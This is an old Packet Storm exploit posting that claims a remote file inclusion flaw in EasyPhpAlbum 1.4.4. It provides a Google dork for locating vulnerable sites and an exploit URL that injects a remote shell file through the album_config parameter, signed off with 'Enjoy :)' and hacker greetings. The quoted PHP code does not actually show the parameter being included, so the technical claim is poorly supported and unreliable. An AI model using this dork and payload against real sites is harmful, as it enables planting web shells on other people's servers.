EasyPhpAlbum 1.4.4 Remote File Inclusion

2011-01-26T00:00:00
ID PACKETSTORM:97890
Type packetstorm
Reporter DIES3L
Modified 2011-01-26T00:00:00

Description

                                        
                                            `# Exploit Title: EasyPhpAlbum v 1.4.4 Remote file include vulnerbility  
# Google Dork: powered by EasyPhpAlbum  
# Date: 26/1/2011  
# Author: DIES3L  
# Software Link: http://www.mywebmymail.com  
# Version: v 1.4.4  
# Tested on: ubuntu + win7  
# Email : zxn@Hotmail.com  
#######################################################  
Fichier : index.php  
http://localhost/[path]/index.php  
  
Code :  
<?php  
include('../configuration.php');  
  
$album_config=false;  
?>  
  
Exploit :  
http://127.0.0.1/[path]/index.php?album_config= [ Shell.txt ]  
  
Enjoy :)  
  
##########################################################  
#  
Greetz To : #  
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #  
#  
##########################################################  
  
`